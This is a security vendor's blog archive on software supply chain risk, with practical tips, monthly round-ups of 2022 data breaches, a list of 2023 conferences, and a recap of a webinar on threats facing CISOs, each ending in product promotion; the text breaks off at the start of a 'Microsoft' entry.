Category Archives: Supply Chain Security

Finally: Practical Guidance for Supply Chain Risk Management

Businesses are being bombarded with warnings from a variety of sources regarding supply chain risk management – ranging from media organizations like Forbes, to analyst firms like Gartner, and even to the White House, which notes that “foreign governments and criminal syndicates are regularly seeking ways to compromise our digital infrastructure” through supply chain attacks.


However, actual advice for managing supply chain risks is harder to come by. Figuring out where risks lie and working to detect them is an exercise that usually falls to individual businesses – which often struggle to put supply chain risk management into practice, given that few organizations focused closely on supply chain risks until just a couple of years ago, when incidents like the SolarWinds breach brought them to the fore.


1. Optimize Supply Chain Visibility


The single most effective step businesses can take to manage supply chain risks is to achieve visibility into their supply chains. You can’t mitigate the risks you can’t see, and if you wait for the risks to impact your own IT environment, it’s too late to prevent them from causing a disruption.


That’s why you need visibility not only into where your software comes from, but also which checks and protections your software suppliers have in place. Believe it or not, vulnerabilities will come from your least expected vendors, and more often than not, your smaller vendors. When you identify vendors who fail to manage risks, you can remove them from your supply chain in order to protect your own organization. This is where continuous monitoring steps in and becomes invaluable to your team by getting ahead of issues before remediation steps are even needed. 


When it comes to supply chain visibility, the more information you have, the better. It’s often impossible to gain complete, definitive visibility into supply chain risks because the “probability and severity of many risks is difficult to ascertain,” as McKinsey partner Tucker Bailey notes. But the more information you have about who your suppliers are, how they build out their own supply chains and which practices they follow to mitigate security risks, the greater your ability to find and respond to the most serious supply chain vulnerabilities.


2. Build Supply Chain Risk Management Into Onboarding


While continuous visibility into the supply chain is one step toward identifying risks, it’s also important to establish a rigorous process for vetting vendors when you onboard them into your supply chain. Identify which specific security controls you expect vendors to have in place, then implement a process that assesses how well they adhere to those practices.


There is always a risk that vendors who meet your requirements during onboarding will become insecure over time, which is why you need to monitor continuously for new supply chain risks. The most common onboarding process is to run an initial risk scan of the vendor and assign a score. The better and more effective method is to schedule a periodic scan that comes with an action plan for any findings.


Even with these processes in place, you shouldn’t skimp on vendor validation at onboarding time. Rooting out risky vendors before they even join your supply chain is more effective than identifying risks after the fact.


3. Plan For Supply Chain Changes


Actually removing risky vendors from a supply chain is hard to do if you depend on those vendors and have no alternatives.


That’s why it’s important to ensure that your supply chain is dynamic enough to accommodate sudden changes in vendors. Always have backup suppliers in mind to whom you can turn if you need to stop using one vendor due to cyber security risks.


Supply chains constantly fluctuate. Vendors that seem rock-solid one day may be in the news the next because they are the center of a major breach. You can’t control what your suppliers do, but you can control your ability to pivot to alternative suppliers quickly in order to mitigate supply chain risks.


4. Enforce Continuous Supply Chain Risk Management


Supply chain risk management should never be a one-and-done affair. Nor should you rely on periodic audits to find risks.


Instead, strive to monitor your supply chain continuously. Continuous monitoring means that you can identify vulnerable third-party software, as well as vendors who are no longer conforming to your security requirements, as soon as the risk emerges. That beats waiting until your next audit to identify a risk – or, worse, not identifying it at all because you vetted your suppliers initially and have no mechanism in place for determining when vendors who were once secure no longer are.


Ensure that the protections that your suppliers claim to have in place actually work. For example, as Jay Shaw explained during a recent LSEG event, don’t just take someone’s word for it that backups are in place. Instead, say “you’re going to get a phone call, and that phone call is going to say, ‘Bam, we’re now down, so do the backup plan. We want to see how long it takes you and how well it works.’”


It might not be practical to vet every vendor in that way, but for high-stakes suppliers, it’s important to know that promises align with realities when it comes to supply chain security protections.


5. Automate Supply Chain Risk Management With Cyber Solutions


For most businesses, the rigorous, continuous supply chain monitoring and risk management practices described above are impossible to implement manually. They would require too much time, and too much effort on the part of employees who already have overfilled plates.


That’s why it’s critical to leverage cyber solutions that automate supply chain risk management. They can identify multiple types of threats within third-party software – including malware, phishing risks, ransomware and beyond – without requiring manual vetting. And they can do this continuously, so that you’re aware immediately when a new risk arises.


Automated cyber solutions have the added benefit of reducing the risk of human error. Your supply chain management tools will operate consistently and reliably, enforcing the same assessment policies over each and every vendor. Humans typically don’t achieve that level of consistency, which means that manual supply chain assessment increases the chances that risks will fall through the cracks.

How Findings can help

As a fully automated platform for identifying and managing risks across your supply chain, Findings makes it easy to put supply chain risk management practices into operation. Findings delivers centralized, continuous visibility into supply chains across any industry, enabling businesses to find and respond to risks before they turn into cyber security incidents.


See for yourself by requesting a demo at Findings.co.

November Security Breach Round Up


From grocery stores, to banks, and everything in between – November saw it all when it came to breaches. As I mentioned in September, hackers are not picky. Let’s just say, when an opportunity arises, they will swoop right in and overtake your systems and access any data they can get their e-hands on.


Be careful, and keep staying informed – our goal is to make sure no company ends up on this list next month. 


Let’s dive in. 


  1. WhatsApp


Whatsapp with this?! The app that we all know, love, and use, WhatsApp, has supposedly fallen victim to a massive data leak. And by massive, I mean nearly 500 million user records have been leaked online. So… what happened? On November 16, 2022, an ad on a well-known hacking community forum was posted by someone claiming to be selling a 2022 database of WhatsApp user mobile numbers. It is also claimed that 32 million users from the United States have been included. Although only phone numbers were leaked, it is important to note that leaked phone numbers are typically used for marketing purposes, phishing, impersonation, and fraud. 


2. Bed Bath & Beyond

Ah, phishing at its finest. While almost anyone who enters Bed Bath & Beyond can get lost for hours browsing, no one likes hearing about breached data. The United States retail giant confirmed that company data was accessed without authorization after an employee was phished. In an 8-K filing to the U.S. Securities and Exchange Commission, Bed Bath & Beyond explained that data on the employee’s hard drive and on other shared drives that the employee had access to was accessed. The company is still investigating whether the drives held any sensitive or personally identifiable information.


3. Dropbox


The file hosting service Dropbox also fell victim to a phishing incident. In a statement, the company explained the situation: “We were recently the target of a phishing campaign that successfully accessed some of the code we store in GitHub. No one’s content, passwords, or payment information was accessed, and the issue was quickly resolved. Our core apps and infrastructure were also unaffected, as access to this code is even more limited and strictly controlled. We believe the risk to customers is minimal. Because we take our commitment to security, privacy, and transparency seriously, we have notified those affected.” The company goes on to explain that on October 14, GitHub alerted them to suspicious behavior. Dropbox found that a threat actor was impersonating CircleCI and was able to access one of Dropbox’s GitHub accounts. To date, their investigation has found that the code accessed by the threat actor contained some credentials, primarily API keys used by Dropbox developers.


4. TransUnion


Isn’t it ironic how an agency that determines your credit score is the one that could be ruining your credit? There are three main credit bureaus in America – Experian, Equifax and TransUnion. Unfortunately, the consumer credit reporting agency TransUnion experienced a breach and began notifying individuals about the incident on November 7, 2022. The company collects and assembles information on over 1 billion consumers worldwide, 200 million of them Americans. The types of information exposed include names, social security numbers, driver’s license numbers, and account numbers.


5. AirAsia


AirAsia, the largest airline in Malaysia, with approximately 22,000 employees and worldwide operations, has unfortunately fallen victim to a supposed ransomware attack. The group behind this attack is known as the Daixin ransomware gang, and it has supposedly stolen the data of 5 million AirAsia passengers and employees. The Daixin team is known for disrupting operations with ransomware and stealing personally identifiable information. With this data in hand, the cyber threat group threatens to release the stolen information unless a ransom is paid. Screenshots that the group posted on the dark web can be seen in a tweet shared by Soufiane Tahiri. The information applies to both employees and passengers. In these documents, information such as date of birth, country of birth, where the person is from, start of employment for employees, and the secret question and answer used to secure their accounts could be found.


6. Sonder


In a company security update, Sonder, a hospitality company, notified the public that they became aware of unauthorized access to one of its systems that included guest records. Information that was accessed includes: 

  • Sonder.com username and encrypted password

  • Full name, phone number, date of birth, address, and email address

  • Certain guest transaction receipts, including the last 4 digits of credit card numbers and transaction amounts

  • Dates booked for stays at a Sonder property

  • Government issued identification such as driver’s licenses or passports


7. Sobeys

This incident shows that ANY business can get breached. Even a supermarket. In case you aren’t familiar, Sobeys is one of the two national grocery retailers in Canada. On November 7, 2022, Sobeys’ parent company wrote in a notice that the grocery stores were impacted by an IT systems issue. While the company hasn’t publicly confirmed a cyber attack on its systems, a local media outlet reported that “two provincial privacy watchdogs said they had received data breach reports from Sobeys. Both Quebec’s access to information commission and Alberta’s privacy commission have been notified by the grocer about a ‘confidentiality incident.’”


8. Whoosh

The Russian scooter-sharing company Whoosh has confirmed that it too was breached. Hackers started to sell a database containing the details of 7.2 million customers on a hacking forum. The data offered on the forum allegedly contains promotion codes that would allow someone to use the service for free, as well as partial user identification and payment card data. Included were email addresses, phone numbers, and first names. Whoosh told the Russian news outlet RIA Novosti that “The leak of some of the personal data of customers of the Russian scooter rental service Whoosh at the beginning of November did indeed occur, but did not affect sensitive user data, such as access to accounts, transaction information or travel details.”


9. Coinsquare


Cryptocurrency is a sexy industry to talk about, but this incident is a little less appealing. To round up the month, the Canadian cryptocurrency exchange Coinsquare has become the latest victim of a security breach. Data such as customer names, email addresses, residential addresses, phone numbers, dates of birth, device IDs, public wallet addresses, transaction history, and account balances were compromised. According to customer reports, Coinsquare contacted them via email to let them know that it had identified an intrusion and that a database containing personal information had been accessed by an unintended third party. In a tweet responding to an account sharing news of the hack, Coinsquare wrote, “We have no evidence any of this information was viewed by the bad actor, but in an abundance of caution, we wanted to make our users aware. We notified all clients, but only identified 3 clients whose accounts were accessed.”



Companies can get careless when it comes to securing their systems, their employees, and their customers. And while we are here to help you, the first step begins with you staying informed. Which we see you are since you made it this far! 


We’re here to help you. Contact us today

Your 2023 Supply Chain Security Conference Rundown


As every supply chain security and cyber security professional knows, there’s no such thing as taking a break from learning. Threats and cyber criminals are constantly evolving, and the only way to protect your organization and vital infrastructure is to stay one step ahead, by learning from the experiences, innovations, and insights of other experts. 


Here are the top supply chain security and cyber security conferences happening around the world this year, so open your calendar and plan your schedule now! 


1. Cybertech Global TLV

January 30 – February 1, 2023

Tel Aviv, Israel

Cybertech Global brings together top thought leaders from around the globe to share ideas and make connections about everything cyber. The three-day conference is an opportunity to hear from experts in the Middle East and beyond on the latest innovations, solutions, and emerging threats in the realm of cyber and supply chain security.


Speakers include Yodfat Buchris, Managing Director of Blumberg Capital; Yaroslav Rosomakho, Field CTO of Netskope; Eyal Cohen, CEO and Co-Founder of Cognifiber; and many more.


2. The Official Cyber Security Summit

February 10, 2023

Atlanta GA, USA

This one-day summit is short but impactful, offering an intensive day of learning about how to protect your business and networking with C-suite and senior executives. With keynote presentations from IBM Security and Huntress, it’s not one to miss. Schedule your trip now to attend sessions, swap ideas, and view demos of new solutions.  


3. CISO Sydney 2023

February 20-22, 2023

Sydney, Australia

The first CISO Sydney conference to take place in person since before the pandemic is packed full of informative sessions and networking opportunities. CISOs from numerous companies will join together to share intelligence, renew connections, and discover new approaches, methodologies, and tech products. The conference also features a focus day on Critical Infrastructure and DevSecOps. With a generous mix of focused talks, panel discussions and group discussions, there are sure to be many points of interest for you.

4. Women in Cyber Security (WiCyS)

March 16-18, 2023

Denver CO, USA

The Women in Cyber Security (WiCyS) conference is an event that strengthens the community of women working in cyber security while enabling attendees to connect, learn, and discover new concepts. This organization has been around for a decade and is dedicated to advancing the role of women in the field of cyber security. 


This event is focused on opportunities for women but is open to all genders. The conference includes resume clinics, mock interviews, and a career fair as well as workshops, keynote sessions, and lightning talks. 


5. Pharma Supply Chain & Security World 2023

March 28-29, 2023

London, UK

With counterfeiting on the rise, pharma companies are more concerned than ever with supply chain security and ensuring traceability and visibility. This year’s Pharma Supply Chain and Security World summit is rightly focusing on new solutions to ‘Building Resilient Pharma Supply Chain’, ‘Serialization and Track & Trace’, ‘Smart Packaging & Labeling’, and ‘De-Risking Supply Chain, Compliance and Contracts’. Speakers include Fausto Artico, Global R&D Tech Head and Director of Innovation and Data Science with GSK and Gianpiero Lorusso, Director, Head of Upstream Logistics with Healthcare Business of Merck. 


6. Third Party Vendor Risk Management for Financial Institutions

April 12-14, 2023

New York, NY, USA

This three-day supply chain security conference is aimed at executives and cyber security heads who are concerned about minimizing supply chain risk. This year, the conference focuses on ideas and tools for monitoring third and fourth parties, increasing visibility into your extended supply chain, and improving risk management.


7. RSA Conference 2023

April 24-27, 2023

San Francisco, CA, USA

The theme for this year’s RSAC is Stronger Together, with an emphasis on sharing information, ideas, and even failures. The RSA Conference offers four days of rich learning opportunities, including hands-on learning labs and Capture the Flag events, as well as keynotes and panel discussions, alongside an Expo that can be explored in person or online.


8. RiskWorld

April 30-May 3, 2023

Atlanta, GA, USA

The annual RiskWorld event is intended for everybody delivering risk management services, from across verticals and around the world. The conference offers four days of networking, insights, solutions, and educative sessions led by risk management leaders and disrupters.


Tracks for the event include Career Development, Cyber and Technology Risk, Risk Modification/Mitigation and Loss Control, and many more. Register your interest to receive the agenda when it is released!


9. Cyber Security and Privacy Professionals Conference

May 1-3, 2023

Bellevue, WA, USA

A highly education-focused conference for cyber security and privacy professionals, this event offers opportunities for attendees to learn and discuss new challenges, emerging threats, and nascent solutions for their fields. The agenda will be released in early 2023, but if the 2022 agenda is anything to go by, this is not to be missed!


10. IMPACT 2023

May 3-4, 2023

Jersey City, NJ, USA

Run by the Ethics & Compliance Initiative (ECI), IMPACT 2023 opens up educational and networking sessions for everyone interested in compliance, regulatory policy, and enforcement. Leading experts and policy makers will share their ideas around strategy, risk, accountability, and ESG across sectors and verticals. Make sure to click through and sign up to their mailing list to be notified when early bird pricing drops! 


11. Third Party & Supply Chain Cyber Security Summit

May 4-5, 2023

Barcelona, Spain

Focusing on end-to-end cyber security practices, this year’s Summit brings together the latest case studies on cyber security implementation for discussion by professionals from leading companies. It’s a great opportunity to learn more about visibility, risk management, and supply chain security across your network. Some of the speakers to look forward to include Syed Ubaid Ali Jafri, Head of Cyber Defense & Offensive Security at Habib Bank Limited, and Andrea Szeiler, Global CISO for Transcom Worldwide AB.


12. Gartner Supply Chain Symposium / Xpo

May 8-10, 2023

Orlando, FL, USA

As you’d expect, the Gartner Supply Chain Symposium brings together some of the top names in supply chain security to explore and investigate big ideas, small details, and actionable insights. The symposium aims to address new and existing disruptions, resilient strategies, and tech investments to minimize risk and maximize rewards. Join David Gonzalez, Conference Chair and VP Analyst and get ready to develop agile and resilient supply chain strategies, learn how to mitigate risk and respond to disruption, how to pursue digital initiatives that drive business growth, and so much more!


13. Black Hat Asia

May 9-12, 2023

Marina Bay Sands, Singapore

Black Hat trainings, briefings, and seminars are highly respected events, and Black Hat Asia is no exception. Held over four days in Singapore, Black Hat Asia 2023 invites all cyber security professionals to learn from researchers, educators, and experimenters in all the fields of cyber security and risk. 


14. American Supply Chain Summit

May 16-16, 2023

Dallas, TX, USA

The American Supply Chain Summit is one of the top supply chain security conferences for leaders and executives, bringing together supply chain security chiefs from leading brands like IKEA, Unilever, and Kroger to share case studies, swap methodologies and strategies, and prepare to meet the next threat. Key themes this year include profitability and risk management, cost optimization, workforce management, and disruptive supply chain tech. Key speakers include Chuck Graham, VP of Microsoft Cloud Sourcing; Tanja Dysli, Chief Supply Chain Officer for IKEA Supply Chain; and Andrew Rendich, Chief Supply Chain Officer for Peloton Interactive.


15. 2023 FINRA Annual Conference

May 16-18, 2023

Washington, DC, USA

Located this year in the Marriott Marquis in Washington, the annual FINRA conference is a highly-regarded opportunity for cyber security, supply chain security, and risk management professionals to learn about current trends and regulatory issues that affect their roles. Speakers come from both the public and private sector as well as academia. 


16. Cybertech Asia 2023

May 2023

Marina Bay Sands, Singapore

Cybertech Asia returns this year, after the 2022 conference had to be postponed due to COVID-19 restrictions. Expectations are high and preparations have been lengthy for this highly anticipated event! Participants can look forward to in-depth discussion about cyber threats and solutions across the sector, including an extensive exhibition center for multinational companies and SMBs alike.


17. Gartner Security & Risk Management Summit

June 5-7, 2023

National Harbor, MD, USA

Aimed at CISOs, risk management leaders, and people in various cyber security positions, the Gartner Security & Risk Management Summit is an arena for learning new ways to protect your organization while making new connections and discovering new insights. Get ready to hear the latest insights from Gartner’s top VP Analysts, such as Patrick Hevesi and Christie Struckman.


18. International Conference on Cyber Security and Resilience (ICCR2023)

July 17-18, 2023

Digital

The ICCR is a research-focused conference that brings together leading scholars and researchers to share their work and ideas about cyber security and resilience. Although it’s aimed at academics, security professionals can gain valuable insights and practical solutions to cyber security, supply chain security, and risk management challenges.


19. Black Hat USA

August 6-11, 2023

Las Vegas, NV, USA / Virtual

Black Hat USA is one of the few cyber security conferences in 2023 that’s still striving to offer a rich hybrid experience. The six-day event includes four days of live, interactive and hybrid trainings, as well as a two-day hybrid conference including keynote speakers and panel discussions to be announced at a later date.


20. National Cyber Summit

September 20-21, 2023

Huntsville, AL, USA

The National Cyber Summit bills itself as the most innovative cyber security-technology event in the US, with a range of focus areas, leading speakers, and unique collaborative opportunities. The agenda and speakers are yet to be announced but you can view previous years on the event website and sign up for notifications for when tickets go on sale. 


21. InfoSec World

September 25-27, 2023

Lake Buena Vista, FL, USA

Now in its 28th year, this year’s InfoSec World offers an opportunity to meet and learn from CISOs and business security experts from a diverse range of top brands, including the NFL, Salesforce, and Carnegie Mellon University. Conference themes include Critical Infrastructure, Hackers & Threats, Identity, and Risk Mitigation, so there’s something to suit everyone. 


22. International Cyber Expo

September 26-27, 2023

London, UK

The International Cyber Expo brings together cyber security experts from a range of sectors, including government officials, CISOs, and leading university researchers. Cyber security and supply chain security professionals will take away plenty of new ideas, solutions, and insights so make sure to register your interest ahead of time. 


23. Cybertech Europe

October 3-4, 2023

Rome, Italy

Cybertech Europe offers an opportunity to listen to experiences, research, and case studies from leading cyber security experts in the public and private sectors. Attendees can join keynote sessions, workshops, and panel discussions on a broad range of topics. 


24. Cyber Security World Asia

October 11-12, 2023

Marina Bay Sands, Singapore


Cyber Security World Asia is a headline event, bringing together thought leaders from top technology companies across Asia to swap intelligence and strategies and present their innovations. The organizers strive to lead the charge in addressing the most pertinent and compelling issues in cyber security, so it should definitely be one to add to your calendar for 2023.


25. Insider Threat Summit

Date TBC

Location TBC

The Insider Threat Summit aims to raise the standard of cyber security across all industries and around the world by working together. It focuses on vulnerability, security, and risk management, with a number of government officials among the speakers and attendees. 


Phew! There are a lot of incredible events coming up in 2023, and you’ll definitely see our Findings team across the globe speaking at a number of them. Make sure to bookmark this page and check back for discount codes on tickets throughout the year.

Waiting for that next conference and eager to learn more about automating your supply chain security? Request a demo.

The New Breed of Cyber Security Threats Coming for CISOs in 2023


Traditional challenges, like ransomware and software supply chain threats, have not gone away. But as we enter 2023, they’re being exacerbated by additional challenges, such as government-sponsored cyberattacks, the increased number of supply chain attacks, new types of phishing exploits and even the possibility that quantum computers will totally invalidate most of the core cyber security tools that businesses rely on today.


Those and other trends were the subject of an excellent webinar hosted recently by the London Stock Exchange Group (LSEG), moderated by Charles Clarke, Head of Security Architecture at LSEG, which brought together industry leaders including:

  • Kobi Freedman, CEO and cofounder of Findings.
  • Reuven Aronashvili, founder and CEO of CYE.
  • Alan Platt, COO at CyberHive.
  • Jay Shaw, CEO of Praxonomy.
  • Alan Moffat, CISO & Director of Business and Cyber Security Services for Sapphire.


This diverse mix of companies and sectors spent the morning discussing what they see as the most pressing cyber security challenges for 2023 and beyond. Although their insights gave CISOs – and businesses in general – plenty of problems to worry about, they also pointed toward solutions that forward-thinking organizations should be adopting in order to protect their operations against cyber threats.


Key Cyber Security Trends for 2023

Although there was consensus that major trends in cyber security for 2023 will vary somewhat between different industries, the overall takeaway from speakers’ comments was that 2023 will see the continued emergence of a new breed of cyber security threats – or new takes on familiar ones.


Quantum Computing

Quantum computers – which use quantum mechanics to supercharge the processing of data – have been in the news for a long time as scientists come closer to developing quantum machines that are actually usable for real-world tasks.


As Alan Platt pointed out, the fact that quantum computing isn’t practical today doesn’t mean businesses shouldn’t be aware of the potential concerns. The reason why is that the sensitive data that businesses are generating today and protecting using encryption may become readable by quantum computers a few years from now.


“Most of the internet at the moment runs on RSA-2048 public key cryptography,” Platt said. “Breaking that using a conventional computer is estimated to take about 13.7 billion years, but a quantum computer doing exactly that same piece of cryptography would be able to crack it in just 42 minutes.”


The point here is that, in the not-so-distant future, security practices that CISOs rely on today to secure sensitive data may become obsolete. They’ll need to work even harder to prevent sensitive information from falling into the wrong hands in the first place, because even if the data is encrypted, quantum computers may be able to defeat the encryption with ease.


Increased State-Sponsored Cyberattacks

Platt also warned that the days may be coming to an end where malicious hackers seeking financial gain are the only people out to ruin a CISO’s day. Increasingly, he said, “the name of the game is about tightening security…against more complex and more damaging attacks that could take out critical infrastructure” – as opposed to threats like ransomware, which can be financially harmful but don’t usually impact physical infrastructure.


This new challenge reflects an increase in cyberattacks by nation-state actors seeking to use cyberwarfare as a means of harming their enemies. Although that practice is not completely new, the war in Ukraine has demonstrated an eagerness by both sides to extend traditional war into the cyber realm, heightening the security challenges faced not just by governments but also by individual businesses, which may be targeted by state-sponsored actors in order to harm the countries in which those businesses are based.


Lingering Covid Security Challenges

The Covid pandemic may effectively be over, but its impact on supply chain security and cyber security is not, according to Alan Moffat.

 

Covid forced companies to shift more of their IT spending into technologies that enable remote work and distributed workforces, and as a result “less budget can be put into cyber security.” Because companies had to adopt work-from-home and hybrid models so quickly, mistakes made during the initial set-up are still being shored up by security leaders. These challenges are exacerbated by the fact that remote work infrastructure is often harder to secure: it involves IT assets that sit beyond the corporate firewall and network, and it lacks the physical security protections of a traditional office environment.

 

This means that CISOs need to do even more with even less budget – which makes strategies like automation and early detection of threats more important than ever.

 

Looking for a step-by-step VDP security roadmap? We’ve got you covered

 

VPNs Are No Longer Up To Snuff

VPNs are intended to protect sensitive data by encrypting packets as they flow between central IT infrastructure and remote locations, such as the PCs used by workers operating outside the office. They don’t make networks less secure, but they don’t necessarily make them more secure, either. Beyond the risk, noted above, that quantum computers could eventually break the public-key cryptography used to establish VPN sessions, VPNs are complicated to administer, and they cause problems for remote users who need to access business resources (like SaaS platforms) that aren’t actually hosted on the corporate network.

 

Instead of placing blind trust in VPNs, companies should be turning to other strategies – like zero-trust access controls – to secure their networks. Zero trust authenticates and authorizes every request to every resource rather than trusting whatever is inside one encrypted tunnel, so it does not stand or fall on a single VPN key staying unbroken, which matters in a world where quantum computing may upend the cryptography we rely on today.

 

New Types of Supply Chain Security Threats

Supply chain security challenges have received a lot of attention in recent years, and many CISOs have begun investing in initiatives to protect their supply chains, as well as to disclose supply chain vulnerabilities efficiently. But they need to do a lot more, according to Kobi Freedman, CEO and Co-Founder of Findings, to get a real handle on the risk.

 

“Looking forward, we see a dramatic increase in attacks which are driven by the IoT” and that target “IoT and industrial environment” systems, our CEO added. Supply chain security strategies that address just the conventional elements of the software supply chain – like server-side applications – aren’t enough. Businesses also need to be able to understand and secure their IoT and operational technology assets.

 

Kobi added that businesses need what he called “long-tail” visibility into the supply chain. He was referring to the ability to understand not just which suppliers a business depends on directly, but also who supplies them, and how supplier relationships evolve over time. Simply compiling a software bill of materials and calling it a day won’t be enough to achieve the deep visibility necessary to secure modern supply chains.

 

And businesses will need to do all of this, Kobi pointed out, with budgets that are likely to remain constrained at least through 2023. As a result, they’ll need to make heavier use of supply chain security automation than ever.

 

Read here: All you’ve ever wanted to know about Vulnerability Disclosure Programs (VDPs)

 

Evolving Phishing Threats

Kobi Freedman also pointed out that the nature of phishing attacks is changing. Businesses have seen an increase in targeted phishing initiatives, known as spear phishing attacks, that target high-level employees rather than ordinary, in-the-trenches workers. These attacks are more sophisticated, resulting in higher levels of success.

 

To counter this, businesses need to understand that humans are often the weakest link in cyber security. “90% of the risk for spear phishing attacks and other exploits comes from the human factor in the organization,” he said. The more businesses know about what their employees have access to, the better they can defend against risks like spear phishing.

 

Thriving In The Face Of 2023 Cyber Security Challenges

Faced with threats like these – as well as traditional challenges, like ransomware – what’s a CISO to do?

 

Part of the answer, the panelists agreed, is to transform cyber security within their organizations from a cost center to a “business enabler,” as Reuven Aronashvili put it. In other words, CISOs should strive to demonstrate to other executives how investments in cyber security can save money by reducing the risk of revenue loss due to IT disruptions. Viewed from that perspective, it’s easier to explain and justify continued spending on initiatives like supply chain security, even in financially tight times.

 

Relatedly, CISOs should align their agendas with overall business needs. That strategy will help to achieve even more buy-in for cyber security investment from a board. One way to do that is by focusing on how cyber security can increase overall visibility into the organization. Cyber security tools protect all parts of the IT estate and extend to all facets of the business, which makes them an excellent resource for understanding what is happening across the company as a whole. They’re not just ways to identify threats, but to gain end-to-end visibility, which businesses can in turn leverage to support continued investment in cyber security initiatives.

 

“What are my crown jewels? What are the lines of business that we need to defend? How will that translate into direct investments into tools and technologies and projects and processes and so on” to keep assets safe? Those are the types of questions CISOs should be asking to keep cyber security in alignment with broader business needs, our CEO said.

 

Planning For Breaches

Beyond the issue of investing in cyber security, Freedman underlined the importance of actively preparing for breaches. After all, it’s not a matter of if a breach will occur, but when. No matter how many fancy, next-gen cyber security tools you deploy, it’s likely that you will be attacked successfully at some point.

 

Preparation against this risk starts with ensuring that the basic tools and protections are in place to detect attacks and begin the response process. From there, CISOs should ensure that their organizations can execute mitigation plans that minimize the impact of a breach. They should also practice addressing the root cause of attacks in order to identify and shut down breaches as quickly as possible.

 

The Changing Role Of The CISO

Ultimately, the net result of the new generation of cyber security challenges that businesses face is that the role of the CISO is changing. Today, the CISO is not just someone who has the last word on cyber security. Instead, as Aronashvili put it, the CISO is now “the middleman between the technical teams and management,” which means that CISOs need to get buy-in from other executives in order to deploy effective cyber security strategies.

 

To that end, CISOs must now focus on communicating the value of cyber security to management. They need to show that cyber security spending actually saves money, and that security doesn’t just support, but actually enables, the operations of the business as a whole.

 

Preparing For The Future With Findings

As CISOs grapple with a new wave of cyber security threats, one challenge they shouldn’t struggle to solve is supply chain security. Findings delivers end-to-end visibility into supply chain security risks and compliance by automatically compiling a profile of your business’s supply chain and helping you understand where your supply chain security challenges lie. No matter how complicated supply chain security may become, Findings makes it easy to conquer the challenge.

 

See for yourself by requesting a demo at Findings.co.

Supply Chain Compliance Strategies for an Economic Downturn


Economists debate whether stubbornly high inflation, combined with interest rate hikes by central banks, has actually created a recession.

But what’s not up for debate are the ways in which the current economic downturn complicates supply chain management. From less consistency within the supply chain, to fewer available resources for manually tracking supply chain compliance issues, the economic environment is imposing significant challenges on businesses.

 

The Economy’s Impact on Compliance and Security

Economic uncertainty affects supply chain compliance initiatives in many ways – some obvious, and some less so.

 

1. The Bullwhip Effect and Lower Profitability

One of the most significant impacts results from what economists call the bullwhip effect. The term refers to the way in which mistaken assumptions about consumer demand reverberate across the supply chain. For instance, if suppliers interpret a temporary uptick in demand for a product as a permanent trend, they may overinvest in production of that product. They then experience lower profit margins because they end up having to sell the product for less, due to lower-than-anticipated demand. Many economists cite the bullwhip effect as one reason why inflation has surged and corporate profits have dropped.

From the perspective of supply chain compliance, the bullwhip effect means that organizations across the supply chain face especially high pressure to squeeze profits out of their products in any way they can – including cutting corners, in some cases. For example, software companies may skimp on security monitoring or trade compliance for their products, placing organizations within their supply chain at risk. This makes the ability to detect supply chain compliance issues more important than ever in the present economic climate.

 

Read here: All you’ve ever wanted to know about Vulnerability Disclosure Programs (VDPs)

 

2. Labor and Fuel Cost Increases Across the Supply Chain

Factors like higher labor costs in regions where suppliers could historically find cheap workers, and the increased cost of fuel, only exacerbate the challenges faced by organizations.

It’s not only product manufacturers who are impacted by higher costs for labor and fuel. These costs flow down the supply chain to affect organizations of all types. A company that develops software is likely paying more for the hardware its developers use, due to the increased labor and shipping costs associated with producing that hardware. So the software company, too, is squeezed by economic challenges that don’t relate directly to software production.

 

 

3. Skimping on Cyber Insurance

The third trend that impacts supply chain compliance – and one that is easy to overlook – is the lower rate of cyber insurance uptake.

In good economic times, organizations would buy cyber insurance in a bid to protect themselves against cyberattacks. Such insurance doesn’t always guarantee solvency following an attack, but it may help in certain situations.

“Insurers have also been hit by the downturn,” says Peter Mansfield, a partner at Reynolds Porter Chamberlain in London. “Policyholders will look to make savings, which may include buying less insurance or better insurance.”

With less money to spend, organizations choose to forgo cyber insurance or purchase less comprehensive coverage. In doing so, they place not only themselves, but also companies within their supply chain, at risk. A software company that suffers a cyberattack and doesn’t have sufficient insurance to recover may go out of business, leaving its products unsupported and insecure – a major risk for customers of those products.

 

Read here: Cyber insurance is great but you need to invest in additional tools that help detect and respond to risks

 

Supply Chain Compliance Opportunities

The good news is that it’s possible to get ahead of supply chain compliance issues by taking advantage of tools that can manage supply chain risk efficiently, regardless of the economic environment.

A healthy supply chain compliance strategy for the economic downturn hinges on visibility. Visibility into how your supply chain works and how it impacts your organization is critical for making informed decisions about supply chain compliance issues. It can also help companies manage costs. As Ed Winterschladen, executive vice president Europe at Proxima, puts it, “In a volatile supply market, running towards cheaper options won’t necessarily deliver value – identifying waste and spending better will prove more effective than reducing costs in areas of essential spend.”

Smart organizations will achieve the visibility they need using AI tools. With the help of AI tools, companies can “make supply chain planning and sourcing more cost efficient through real-time analytics and insights to help drive efficiency and productivity through its supply chain,” according to GEP. GEP also reports that two-thirds of executives identify enhanced supply chain visibility as a top priority for mitigating disruptions in 2022.


The value of improved supply chain visibility extends beyond controlling costs and supply chain compliance issues. It’s also a way of demonstrating to partners, investors and customers that your organization can thrive through times of challenge. As Accenture notes, “Consumers, investors, governments and communities may ultimately judge companies on how they respond to this period of disruption.”

 

Harden your supply chain against uncertainty

In short, now is the time for organizations to invest in efficient, comprehensive supply chain visibility and risk management. The threat of non-compliance within supply chains increases during times of economic uncertainty. AI-assisted supply chain visibility solutions make this challenge easier to meet without breaking the bank or burdening risk management teams with manual effort.


Contact Findings to learn more about how we can help protect your supply chain – in both the best and worst of economic times.

October Security Breach Round Up

October was Cyber Security Awareness Month, and yet, another month, another breach. In a month that is geared towards helping organizations protect themselves, large companies have yet again fallen victim to these heinous attacks. One after the other, many companies and their consumers are now wondering when these breaches will stop. 

 

Here are our top October 2022 know-worthy incidents:

 

Toyota:

    • Toyota is no stranger to data breaches. And by the looks of it, the company hasn’t learned from past mistakes (remember the 2019 breach that affected over 3 million of Toyota’s customers?). On October 7, 2022, Toyota issued an apology after the data of nearly 300,000 users of T-Connect, a telematics service that connects vehicles via a network, was exposed. The Japanese car giant explained that the leak occurred because an access key had been publicly available in a GitHub repository for almost five years, so email addresses and customer control numbers may have been exposed since 2017.


Microsoft:

